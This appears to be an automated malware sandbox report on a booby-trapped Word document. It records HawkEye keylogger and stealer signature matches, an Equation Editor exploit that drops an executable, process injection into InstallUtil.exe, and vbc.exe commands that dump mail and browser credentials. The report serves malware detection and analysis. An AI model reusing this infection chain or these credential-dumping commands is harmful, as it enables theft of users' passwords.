            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            .NET source code contains very large array initializations
            Source: 4.2.name.exe.30000.0.unpack, g4K/Dj6.cs | Large array initialization: .cctor: array initializer size 4259
            Source: 4.2.name.exe.30000.0.unpack, k0N/Ee6.cs | Large array initialization: .cctor: array initializer size 4998
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\name.exe
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Memory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Memory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Memory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A8598 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A8580 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A85A4 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001ADA88 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001AE018 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A85BC NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A85B0 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A8670 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A8694 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A8688 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A86AC NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001A86A0 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 5_2_001ADF60 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_009E3668 CreateProcessAsUserW,
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\InstallUtil.exe 815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413F8E appears 66 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413E2D appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00442A90 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004141D6 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00411538 appears 35 times
            Source: 5.2.InstallUtil.exe.5e0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.4e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.2689414.10.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.2684de0.9.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'zfWNmoVCmw9cYxvRPzpOe7yARVOHExi6TsOCR63LGMs+Lv0nLSEyXoiEOPiEzRyN', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
            Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@10/15@5/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$0072109764552.docJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD9EA.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: 280072109764552.docReversingLabs: Detection: 31%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
            Source: C:\Users\user\AppData\Roaming\name.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
            Source: C:\Users\user\AppData\Roaming\name.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
